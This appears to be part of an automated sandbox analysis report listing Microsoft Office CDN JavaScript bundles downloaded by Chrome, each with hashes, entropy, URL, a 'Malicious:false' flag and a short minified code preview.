                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["fui.lco"],{"fui.lco_35":(e,t,n)=>{n.d(t,{IkT:()=>qf,pzV:()=>Jd,JK0:()=>Pa,Fbi:()=>Fl,GKf:()=>wa,v6w:()=>Oa,m0G:()=>Zd,A8$:()=>el,sES:()=>gf,vr3:()=>Ds,oKI:()=>_s,cAF:()=>Mo,ydh:()=>yg,lkX:()=>vg,v3M:()=>vs,S_D:()=>m1,Toz:()=>b1,hs9:()=>h1,TKj:()=>Rp,tQv:()=>jr,YHK:()=>Tu,OoB:()=>tu,_gz:()=>Yl,iri:()=>$l,MLw:()=>su,VYB:()=>Wl,muI:()=>ql,JrC:()=>wu,M_L:()=>Gl,_zj:()=>Lu,jX1:()=>Iu,Y2_:()=>xu,xcR:()=>Hu,mIz:()=>Wa,KqL:()=>xi,udW:()=>br,TpI:()=>Yh,tp7:()=>yp,rCD:()=>Ip,k84:()=>Cp,vq1:()=>Sf,Exo:()=>ip,Xu3:()=>Af,CCz:()=>mp,O$y:()=>y1,bnW:()=>I1,g5H:()=>ep,NPU:()=>np,_WT:()=>Zf,tNL:()=>Qf,W5Y:()=>tp,NF1:()=>vo,sIi:()=>es,M$0:()=>Co,cYW:()=>Nr,llj:()=>m,pZ2:()=>eo,A55:()=>Xr,jo4:()=>xo,v2H:()=>us,L$c:()=>Ui,WfK:()=>oo,HkY:()=>ro,bCl:()=>io,Iqq:()=>xe,Qwj:()=>Me,gkY:()=>tl,EAn:()=>dl,QiW:()=>Ap,JaD:()=>cl,ZRG:()=>sl,d2y:()=>Gc,W3S:()=>Lp,$Hj:()=>Gd,ijR:()=>jd,ECZ:()=>ks,BGu:()=>pc,Cgw:()=>Xp,kgm:()=>em,e7h:()=>am,p
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (65457)
                              Category:downloaded
                              Size (bytes):138212
                              Entropy (8bit):5.329891063317592
                              Encrypted:false
                              SSDEEP:
                              MD5:E9D5BCD814CB69E07AA44C23ADD3551E
                              SHA1:670A023724D62597DE6640565D699465D23ADA3B
                              SHA-256:FC65C25BEE3DFAB858391F436D4181C78891B1661831FA6E732DD7AE7F4190FE
                              SHA-512:4C81AF40895F3131AD33301A0F370B57BD5A4246D1F7E79E82BDB1DB3D1B3254BEB0F200733F9136EAB39CE4FA77D83A1E31E028CC4639D30435F8FE1CB71EC6
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/sp-client/odsp.1ds/odsp.1ds.lib-ec85ee49.js
                              Preview:/*! For license information please see odsp.1ds.lib-ec85ee49.js.LICENSE.txt */."use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["odsp.1ds.lib"],{"1ds-lib":function(e,t,n){n.r(t),n.d(t,{_InMemoryPropertyStorage:function(){return vs},_OneDSLogger:function(){return gs}});var a={};n.r(a),n.d(a,{optionalDiagnostic:function(){return ts},requiredDiagnostic:function(){return es},requiredService:function(){return ns}});var i=function(e,t){return i=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(e,t){e.__proto__=t}||function(e,t){for(var n in t)Object.prototype.hasOwnProperty.call(t,n)&&(e[n]=t[n])},i(e,t)};function r(e,t){if("function"!=typeof t&&null!==t)throw new TypeError("Class extends value "+String(t)+" is not a constructor or null");function n(){this.constructor=e}i(e,t),e.prototype=null===t?Object.create(t):(n.prototype=t.prototype,new n)}var o=function(){return o=Object.assign||function(e){for(var t,n=1,a=arguments.length;n<a;n++)for(var i i
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (3269)
                              Category:downloaded
                              Size (bytes):6699
                              Entropy (8bit):5.378219519323746
                              Encrypted:false
                              SSDEEP:
                              MD5:18FB22C730176A64993ADB1C1520AAD8
                              SHA1:AA4B1CD48CB37A899490A315F5F71EF4C5F0E777
                              SHA-256:38A9D47724B86887EF86B5C75A2A15F830D189062404E540324D04A68A76FD70
                              SHA-512:B0041AF7BAEC70BDA76D66F9CF16383AB90C8921A8AA84F8DEF644C21D4D1EDA2F3874822E8ED4C70BFE3E95D38B71A4DD86CB99EC37E8F958326A7075C313B1
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/1497.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[1497],{3858:function(e,t){t.a='<div data-bind="element:rootElement,keyboard:keyboardOptions,react:reactBindingParams"></div>'}.,2888:function(e,t,n){var a=n("tslib_102"),i=n(2089),r=n(2111),o=n(2202),s=n(2124),c=n(2117),d=n(2097),l=n(2889),u=n(16),f=n("odsp.util_578"),p=n(69),m=(0,u.a)(function(){return(0,a.Zd)(void 0,void 0,void 0,function(){return(0,a.qr)(this,function(e){switch(e.label){case 0:return[4,Promise.all([n.e(2),n.e(38),n.e(1555)]).then(n.bind(n,3185))];case 1:return[2,e.sent().ReactCommandBar]}})})}),_=function(e){function t(t,n){var a=e.call(this,t,n)||this;a._responsiveUI=n.responsiveUI,a.addBindingHandlers({react:d.b,element:s.a,keyboard:c.a,interactionScope:o.b});var i=a.observables.create(!0);a._reactCommandManager=a.scope.attach(new n.reactCommandManagerType({commandSet:t.commandSet,isActive:i})),a.rootElement=a.createObservable(),a.shouldBlockEscKey=a.createObservable(!1),a.keyboardOption
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (7413)
                              Category:downloaded
                              Size (bytes):7463
                              Entropy (8bit):5.463497522552333
                              Encrypted:false
                              SSDEEP:
                              MD5:B147AFA540D6B7FD388F397E306BFA59
                              SHA1:1E7A255C6C7356D1176085C90BDFF420438395AE
                              SHA-256:63DF7E3DEB3350812F5739A9F3EA48564EBC09672A7293BC8AD9F01A5A6A1ACA
                              SHA-512:995858A83CC6419A41ADB1905D64699FA21EF0B3EE51813224BE5785A8058F7F3BB5B39D9FC8A6438AA9A8CD268D0CA5BA9F276E62DA6D47F88483391EA8A906
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/3.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[3],{6075:function(e,t,n){n.d(t,{a:function(){return b},b:function(){return y},c:function(){return D},d:function(){return I},e:function(){return S}});var a,i=n("tslib_102"),r=n(1643),o=n(635),s=n(378),c=n(20),d=n(2343),l=n(1507),u=n(2401),f=n("odsp.util_578"),p=!f.HW.isActivated("5428C17B-A89D-4E63-A1C5-B3E989C1B7A3","8/21/2023","Remove color tag from edit view columns"),m=f.HW.isActivated("b7f49711-c56b-4749-a1bc-a91875390f45"),_=f.HW.isActivated("54b0c38f-b2dc-4be3-98ff-627ec8e4bdef"),h=((a={})[d.c.icon]={key:"type",index:0,isVisibleMobile:!0,isCollapsable:!1,type:l.a.FileIcon},a[d.c.name]={key:"name",index:1,isRowHeader:!0,isVisibleMobile:!0,isCollapsable:!1,minWidth:d.a.nameMin,width:d.a.nameODB,type:l.a.Name},a[d.c.title]={key:"Title",index:1,isVisibleMobile:!0,isCollapsable:!1,minWidth:d.a.nameMin,width:d.a.nameODB,type:l.a.Title},a[d.c.shareHeroCommand]={key:"_shareHeroCommand",index:2,isVisibleMobile:!
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (10293)
                              Category:downloaded
                              Size (bytes):252113
                              Entropy (8bit):5.387822801799901
                              Encrypted:false
                              SSDEEP:
                              MD5:9B5E1918B15535373A647B405D5AC784
                              SHA1:2BAC7BCDD693FA3F91C6D123FF8934CD3048C459
                              SHA-256:DF5423FA073DECB40A68AC1EA30E2956CF7E6A73E0911C017CF703A2FFD072D6
                              SHA-512:AFB8CFBE21F0FD8BE0361D0FB6312449E414A59C98D6445BFBF5A573078D62DDB8A247B5AC024218028093B104E0B14030C9E48EEB739DD9F9DC0181F4DB37FB
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/metaosfilebrowser/36.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[36,884,646,755,713,757,49,53,66,63,77,109],{266:(e,t,n)=>{n.d(t,{a:()=>M});var a,i=n(5398),r=n("tslib_102"),o=n("react-lib"),s=n(5401),c=n(5411),d=n("fui.util_150"),l=n(5611),u=n(5778),f=n(5771),p=n(255),m=n(502),_=n(5784),h=((a={})[p.a.info]="Info",a[p.a.warning]="Info",a[p.a.error]="ErrorBadge",a[p.a.blocked]="Blocked2",a[p.a.severeWarning]="Warning",a[p.a.success]="Completed",a),b=(0,s.a)(),g=function(e){switch(e){case p.a.blocked:case p.a.error:case p.a.severeWarning:return"assertive"}return"polite"},v=function(e){switch(e){case p.a.blocked:case p.a.error:case p.a.severeWarning:return"alert"}return"status"},y=o.forwardRef(function(e,t){var n=(0,m.a)(!1),a=n[0],i=n[1].toggle,s=(0,_.a)("MessageBar"),y=e.actions,S=e.className,D=e.children,I=e.overflowButtonAriaLabel,x=e.dismissIconProps,C=e.styles,O=e.theme,w=e.messageBarType,E=void 0===w?p.a.info:w,A=e.onDismiss,L=void 0===A?void 0:A,k=e.isMultiline,M=void
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (2605)
                              Category:downloaded
                              Size (bytes):4816
                              Entropy (8bit):5.33905691943688
                              Encrypted:false
                              SSDEEP:
                              MD5:D15D8B46951155013F2CD7116728E7C6
                              SHA1:1212D3D069FEF4AEA33D73B2F64EA4E8FE26ACE1
                              SHA-256:35965A8811CBC8751B52AA3E817D8FE8C8D385F9D1D10B33912074921997308D
                              SHA-512:2514EE6B71340E1BB0D54503F50D2F70E57C564D0063FDF67179E1E7714FBEB22C85EA5AACCE3BCC18633B12BDFE72726F9AC4D7EEB1C8C16CF7E246423F44DB
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/1077.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[1077],{2233:function(e,t,n){n.d(t,{a:function(){return d}});var a=n("tslib_102"),i=n(55),r=n(140),o=n("odsp.util_578"),s=n(274),c=n(28);function d(e){var t=this,n=e.progressItemKey,u=e.started,f=e.completed,p=e.progressSize,m=e.isBatch;return function(_){return(0,a.Zd)(t,void 0,void 0,function(){var t,h,b,g,v,y,S;return(0,a.qr)(this,function(D){switch(D.label){case 0:t={operation:d},h=l(e.onCreated,function(e){}),b=l(e.onStarted,function(e){var t;m||_((0,c.a)({items:(t={},t[e.progressItemKey]=(0,a.W_)((0,a.W_)({},r.s.pack(r.d.started)),"number"==typeof p?(0,a.W_)({},r.t.pack({total:0,current:0})):{}),t),publisher:b}))}),g=l(e.onCompleted,function(e){var t;m||_((0,c.a)({items:(t={},t[n]=(0,a.W_)((0,a.W_)({},r.s.pack(r.d.completed)),"number"==typeof p?(0,a.W_)({},r.t.pack({total:0,current:p})):{}),t),publisher:g}))}),v=l(e.onFailed,function(e){var t,n=e.error;m||_((0,c.a)({items:(t={},t[e.progressItemKey]=(0,a.
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (65536), with no line terminators
                              Category:downloaded
                              Size (bytes):154565
                              Entropy (8bit):5.374597790252048
                              Encrypted:false
                              SSDEEP:
                              MD5:53824A3776AC5B1F2B632E02BBF20285
                              SHA1:CF38385ECDAE6E889B6162D7E0F5D5451D45BA63
                              SHA-256:A6284641A0E964753DA01AD24BC43405CCE4D692B56952078E86B660BB64D0F5
                              SHA-512:76D62CE9B1F132A16A91054FE81B3CCD4C0E4410C8EE26DC275E91627C84C564142C559C85A859563226DA71532ACA045B6068776B8A5806C767C142B59122FA
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/25.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[25],{737:(e,t,n)=>{n.r(t),n.d(t,{AppContextFlags:()=>dt,DataSyncListStatus:()=>f.a,DataSyncListStatusAttentionReason:()=>r,DataSyncListStatusError:()=>i,DataSyncOperationType:()=>a,FileUsageApi:()=>ut,NucleusNotificationType:()=>f.b,NucleusSessionClientQos:()=>sa.a,getDataSyncClient:()=>ua,getDataSyncClientAsync:()=>fa,initNucleusUser:()=>ma,resetTestState:()=>_a});var a,i,r,o=n("tslib_102"),s=n("odsp.util_578"),c=n(176);!function(e){e.Unspecified="Unspecified",e.ListQuickEdit="ListQuickEdit",e.ListHomeEnumeration="ListHomeEnumeration"}(a||(a={})),function(e){e[e.UnknownError=0]="UnknownError"}(i||(i={})),function(e){e[e.SetupRequired=0]="SetupRequired",e[e.SignInRequired=1]="SignInRequired"}(r||(r={}));var d,l,u,f=n(241),p=n(116),m=n(51),_=n(496),h=function(e){return l(e)},b=function(e){return l({msg:e,error:!0})},g="sharepoint.datasync.nucleus.logToConsole";try{u=window.localStorage.getItem(g)}catch(ct){u=n
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (11855)
                              Category:downloaded
                              Size (bytes):17773
                              Entropy (8bit):5.247308689926031
                              Encrypted:false
                              SSDEEP:
                              MD5:5E535F6D7CEBD076194C2CF9926120BA
                              SHA1:3A23802A91DB2A4388F13CD075E6ABA537C722E9
                              SHA-256:710F97941B3EF0F03D2B0C331C91883C2D3C5C9031D48B3B009D40A1E0365D2B
                              SHA-512:808A689C66BB8BEC1EF1DED7D2A08E7AD5043AFD358FD461A0EDC77FC74A10458981C33A3B1FB052D8A2C9DC297636376A7B1138F37C8ED346384ADF9D587806
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/93.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[93],{3857:function(e,t,n){n.d(t,{a:function(){return i}});var a=n("tslib_102"),i=(0,n(16).a)(function(){return(0,a.Zd)(void 0,void 0,void 0,function(){return(0,a.qr)(this,function(e){switch(e.label){case 0:return[4,n.e(1027).then(n.bind(n,2663))];case 1:return[2,e.sent().ColoredFolderFileTypeIconBase]}})})})}.,2890:function(e,t,n){n.d(t,{a:function(){return i}});var a=n("tslib_102");function i(e,t){var n=function(n){var i=e.peek(),r=t.peek();t.valueWillMutate(),r.splice.apply(r,(0,a.AE)([0,r.length],i,!1)),t.valueHasMutated()},i=e.subscribe(n,null,"arrayChange");return n(),i}}.,6363:function(e,t,n){var a=n("tslib_102"),i=n("react-lib"),r=n("react-dom-lib"),o=n(176),s=n("fui.lco_35"),c=n("fui.lcu_548"),d=n("fui.lcoms_307"),l=n(2088),u=n(4645),f=n("fui.lcom_959"),p=n("odsp.util_578"),m=n(922),_=(0,s.dsi)(),h=function(e){function t(t){var n=e.call(this,t)||this;n._scope=new o.a;var a=n.props.command.resources;n.
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (9696)
                              Category:downloaded
                              Size (bytes):13796
                              Entropy (8bit):5.1654353945864635
                              Encrypted:false
                              SSDEEP:
                              MD5:53011BAD687076A6E8C9EDB54879E4D4
                              SHA1:CCBD5676B5D3C3C061902EC4B846251B5A987288
                              SHA-256:6D5EE089320DC791B3D4EC3432C753F9716E1A62A7509527D16691E6935193E0
                              SHA-512:BAE2B458E3AD53F74FA80B915C836E9AA1F35FAC32B785519FB381A8EF83D7B7BC2F2AB99E094B4B3DFA14CA4B96735EB57B6E325E986A84EF450CE037C3ADAA
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/26.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[26],{983:(e,t,n)=>{n.d(t,{a:()=>m});var a=n("tslib_102");const i=function(){function e(){}return e.tokenCacheSessionStorageId="tokenCache",e.aboutToExpireIntervalSeconds=600,e.apiUrl="/_api/SP.OAuth.Token/Acquire",e.retries=3,e.retriableErrorCodes=[10006,10008],e.unexpectedErrorCodeFormat="Expected error code format is <numericCode>, <exception class name>",e.unexpectedTokenMessageFormat="Your token request succeedeed but the token could not be parsed from the response.This is most probably caused by a change in the server response format",e.npmPackageVersion="0.1.5",e}();var r;!function(e){e[e.unknownError=0]="unknownError",e[e.malformedResponseBody=1]="malformedResponseBody",e[e.serverError=2]="serverError"}(r||(r={}));const o=function(e){function t(n,a){var i=e.call(this,a.message)||this;return i.__proto__=t.prototype,i._type=n,i._httpResponseStatus=a.httpResponseStatus,i._cultureName=a.cultureName,i._mess
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (12199)
                              Category:downloaded
                              Size (bytes):531749
                              Entropy (8bit):4.973662704991777
                              Encrypted:false
                              SSDEEP:
                              MD5:C76729381786EBB9C9314CC20560BE7C
                              SHA1:9F54C0D9690BCA0E5FDD68D6395B6346DFA8D833
                              SHA-256:00BC889838A26F2A1A5797E44C2F228413A3DD41572347E9DE5A6A6506DDB115
                              SHA-512:EF10B2B894B24A349DB23A00DC882AA49C9A9ECFCAB39C75F6E55EF211FB3407B896E71210D616504971ABD86041EDAF47AFA6EDA310E92485CDAE484A68A505
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/file-browser-odb-teams/es/ondemand.resx.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["ondemand.resx"],{6474:e=>{e.exports=JSON.parse('{"a":"EnvironmentType is invalid","b":"Invalid GUID string: \\u0022{0}\\u0022","f":"The value for \\u0022{0}\\u0022 is false","g":"The value for \\u0022{0}\\u0022 must not be null","h":"The value for \\u0022{0}\\u0022 must not be undefined","e":"The value for \\u0022{0}\\u0022 must not be an empty string","d":"The \\u0022{0}\\u0022 object cannot be used because it has been disposed.","c":"Invalid version string: \\u0022{0}\\u0022","j":"Cannot consume services because the scope is not finished yet","k":"Cannot consume services during ServiceScope autocreation","i":"The ServiceScope is already finished","l":"Cannot register service because the scope is already finished","m":"The service key \\u0022{0}\\u0022 has already been registered in this scope","o":"INNERERROR:","n":"CALLSTACK:","p":"LOGPROPERTIES:"}')}.,7214:e=>{e.exports=JSON.parse('{"a":"A source with id
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (49570)
                              Category:downloaded
                              Size (bytes):103752
                              Entropy (8bit):5.209650832715891
                              Encrypted:false
                              SSDEEP:
                              MD5:1EB75AFCE7A961FF960CAA7B02DDAF31
                              SHA1:94E69636FD622A5BE317FE0C458564E71C1865EB
                              SHA-256:902C5698F959521F923CD0FF99C8E99823D58234D8B8559AE11978E5DF007E5E
                              SHA-512:A7646134E02CBBC0124D50826691FAE099B982E3B61372D6B5FB1ADB1524A7FE2DCE1804C6A9067C2F5056BE26FFDB6F0BA2D1258C7F952250263632F9BE833B
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/232.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[232],{900:(e,t,n)=>{n.d(t,{a:()=>i});var a=n(842);function i(e){return(0,a.a)(e())}}.,893:(e,t,n)=>{n.d(t,{a:()=>c,b:()=>s});var a=n(830),i=n(324),r=n(829),o=new a.a("operation",{operationTypeId:i.b,keyFacetId:i.b});function s(e){var t=e.operationTypeFacet,n=e.keyFacet;return o.serialize({operationTypeId:t.id,keyFacetId:n.id})}function c(e){var t=o.deserialize(e),n=t.keyFacetId,a=t.operationTypeId;return{keyFacet:r.a.get(n),operationTypeFacet:r.a.get(a)}}}.,894:(e,t,n)=>{n.d(t,{a:()=>l,b:()=>d,c:()=>c});var a=n("tslib_102"),i=n(829),r=n(893),o=n("odsp.util_578"),s=n(895),c=new i.a("noRegisteredHandlerError");function d(e){var t=e.operationTypeFacet,n=e.keyFacet;return new s.a({message:"There is no operation handler registered for operation type '".concat(t.id,"' of key facet '").concat(n.id,"'."),isExpected:!0,facets:(0,a.W_)({},c.pack((0,r.b)({operationTypeFacet:t,keyFacet:n})))})}var l=function(e){function
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (2502)
                              Category:downloaded
                              Size (bytes):3999
                              Entropy (8bit):5.443358997569214
                              Encrypted:false
                              SSDEEP:
                              MD5:2FF09A2C20C22994C74C2083F3FAF0EC
                              SHA1:EAACE919E7EE8876F56B0AA58678BFE6581D5D98
                              SHA-256:F4D2B70AFCD54495614D797A5C8A4A315416B16D63E14ACD6EE840449CCF0E38
                              SHA-512:BA9EF8AAE546B229DC4EB68807EA0EC890DD1F232C6F1F608FFDAF7049ADD92371374B5BB0159E2621964CED5D7F57D4665A29BD616B81630038031389563068
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/44.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[44],{644:(e,t,n)=>{n.r(t),n.d(t,{getCurrentListDataKey:()=>S});var a=n("tslib_102"),i=n(102),r=n("odsp.util_578"),o=n(4),s=n(14),c=n(33),d=n(129),l=n(17),u=n(103),f=n(142),p=n(156),m=n(215),_=n(43),h=n(24),b=n(104),g=n(2),v=r.HW.isActivated("e5b0dcc6-2548-4346-96a4-883ad0486577","05/19/2023"),y=r.HW.isActivated("06a758c4-8ee6-4161-807f-a31f70d904c6","03/11/2024"),S=new r.qT({name:"GetCurrentListData",factory:{dependencies:{pageContext:o.a,navigation:i.a,listDataProvider:o.n,listViewStore:c.a,listDataStateStore:s.a,listDataStateStoreUpdater:s.b,listItemStore:l.a,appStateStore:u.a,getItemKeyFromViewParams:m.a},create:function(e){var t=e.pageContext,i=e.listDataProvider,o=e.navigation,s=e.listItemStore,c=e.getItemKeyFromViewParams,l=(0,a.l7)(e,["pageContext","listDataProvider","navigation","listItemStore","getItemKeyFromViewParams"]);return{instance:function(){return(0,a.Zd)(this,void 0,void 0,function(){var e,u
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (44463)
                              Category:downloaded
                              Size (bytes):220316
                              Entropy (8bit):5.434596935633896
                              Encrypted:false
                              SSDEEP:
                              MD5:3B040C306212AFFFD83A2115A7B3EA9A
                              SHA1:2501A0F827D5BD2787B126DB9AFEDB5E9097E989
                              SHA-256:D10525E0D965317A4DF8F87A9CD42BD6C01BDEAFB923D2F417CB79286101322B
                              SHA-512:57544FF2FB661F99F5CA1AF3968A5AA1F9F6516B32C3829C289AA82B77D3346064C3B994DB4F1383AD4C47434976E2821368C6AF4186E0C5FA76EBF7DB1D9BF0
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/@ms/stream-bundle/chunks/fluentMtc.js
                              Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[95954],{38500:(e,t,n)=>{n.d(t,{f:()=>s});var a=n(281546),i=n(408156),r=n.n(i),o=n(285618),s=r().memo(function(e){var t=(0,o.HF)().fluentMtcProviderId;return r().createElement(a.Ib,{value:t},e.children)})}.,285618:(e,t,n)=>{n.d(t,{HF:()=>v,Km:()=>b,Sp:()=>m,nl:()=>_,op:()=>S,rO:()=>g,uQ:()=>h,w5:()=>y,zL:()=>D});var a=n(295610),i=n(408156),r=n.n(i),o=n(836682),s=n(639849),c=n(327482),d=n(567022),l=n(188830),u=n(551803),f=n(241171),p=r().createContext({}),m=["ArrowDown","ArrowLeft","ArrowRight","ArrowUp","Digit0","Digit1","Digit2","Digit3","Digit4","Digit5","Digit6","Digit7","Digit8","Digit9","Enter","KeyC","KeyG","KeyJ","KeyK","KeyL","KeyM","KeyO","KeyP","KeyR","KeyS","KeyX","KeyZ","Slash","Space"],_=function(e){var t=e.children,n=e.uiConfiguration,i=e.player,m=e.context,_=e.playerContainer,h=e.themeData,b=e.getHostTheme,g=e.overflowButtons,v=e.reportUserActivity,y=e.pluginsKeyboardShortcuts,
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (1355)
                              Category:downloaded
                              Size (bytes):1360
                              Entropy (8bit):5.213530652718317
                              Encrypted:false
                              SSDEEP:
                              MD5:DBA4DF31AA34B98BB989A9E646E1FDE2
                              SHA1:7CAC255EDBE1F1DD0AE2526BB3BA22E72AAE3682
                              SHA-256:B35CA1362BDD4C15037E09049500F8FD17B1AEB260946ED028CF1EBA552DB66D
                              SHA-512:1784A2D3844663FAFB1EE11D2D6BE6A034ECD56307C3E14332738A7436874EF50F460B882BFBA4F1EA7F3B7E14D6FC584C4C3632110E67CD4F00D4B0AB3C9595
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/63.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[63],{417:(e,t,n)=>{n.r(t),n.d(t,{checkForKeyboardFocusableElement:()=>d,handleShiftMovementSelection:()=>c,selectAllItemsInRange:()=>s});var a=n(40),i=n(3),r=n(84),o=n(12);function s(e,t,n,a){var r,s,c,d=e.rootRef,l=e.addAllToSelection;if((0,e.removeAllFromSelection)(),!(0,o.i)()&&a)s=a.indexOf(t),c=a.indexOf(n);else{var u=(0,i.I)(d.current,t),f=(0,i.I)(d.current,n);s=u.rowIndex,c=f.rowIndex}s>c&&(s=(r=[c,s])[0],c=r[1]);for(var p=[],m=s;m<=c;m++){var _=void 0;if((0,o.i)()){var h=(0,i.H)(d.current,m);_=h&&(0,i.C)(h)}else _=a?a[m]:void 0;_&&p.push(_)}l(p)}function c(e,t){var n=e.rootRef,o=e.focusedItemKey,s=e.selection.selectedItemKeys,c=e.addItemToSelection,d=e.removeItemFromSelection,l=e.setFocusedItemKey,u=e.isItemSelectable,f=e.rowFocusInputRef,p=e.enableHeaderFocus;if(o&&n.current){var m=(0,i.cb)(n.current,o,t);if(!(0,i.w)(m)&&m&&m!==o&&(!u||u(m))){var _=o;m!==i.n&&(n.current.classList.add(a.o),(null==f?vo
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (7059)
                              Category:downloaded
                              Size (bytes):124541
                              Entropy (8bit):5.059200189546883
                              Encrypted:false
                              SSDEEP:
                              MD5:7EF20F98C04A06A044276B801FB23AB2
                              SHA1:887A6CC9C384549F70379B4455FF146D9FE7CB43
                              SHA-256:F334D93CD98DE35F5222368A041FEC2BFD66979A37714529C099ACD350419178
                              SHA-512:10999ED940465EC98B13DC3F2E92F8E73AD3CFF47CB9658C266B28ECA12244E54843B5A1AC6C461CAB77AD2F549AFED4DF80480013BB303289D51B59C0E14801
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/en-gb/ondemand.resx.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["ondemand.resx"],{2266:e=>{e.exports=JSON.parse('{"a":"EnvironmentType is invalid","b":"Invalid GUID string: \\u0022{0}\\u0022","f":"The value for \\u0022{0}\\u0022 is false","g":"The value for \\u0022{0}\\u0022 must not be null","h":"The value for \\u0022{0}\\u0022 must not be undefined","e":"The value for \\u0022{0}\\u0022 must not be an empty string","d":"The \\u0022{0}\\u0022 object cannot be used because it has been disposed.","c":"Invalid version string: \\u0022{0}\\u0022","j":"Cannot consume services because the scope is not finished yet","k":"Cannot consume services during ServiceScope autocreation","i":"The ServiceScope is already finished","l":"Cannot register service because the scope is already finished","m":"The service key \\u0022{0}\\u0022 has already been registered in this scope","o":"INNERERROR:","n":"CALLSTACK:","p":"LOGPROPERTIES:"}')}.,2455:e=>{e.exports=JSON.parse('{"a":"A source with id
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (27634)
                              Category:downloaded
                              Size (bytes):37884
                              Entropy (8bit):5.225942752747051
                              Encrypted:false
                              SSDEEP:
                              MD5:8903A8ED462737CFAD465FBADD5BC210
                              SHA1:C780FEC889C2849C2966845177D1D7378D5FDEA8
                              SHA-256:BB3BEB6EF5AE3EC460B2464E6A0B4738C38AC6E6DFBF0626B5036D8C8729E6BB
                              SHA-512:8505354804A53D6DC62C07F07F057B7D5C995121E79C4B1E8A54E78C96CDD67E1E6A0DFF9B20C643ED7D7D737899C81371BD2A9E4B2D2F7C3759D8E6DCA78A3E
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/metaosfilebrowser/20.js
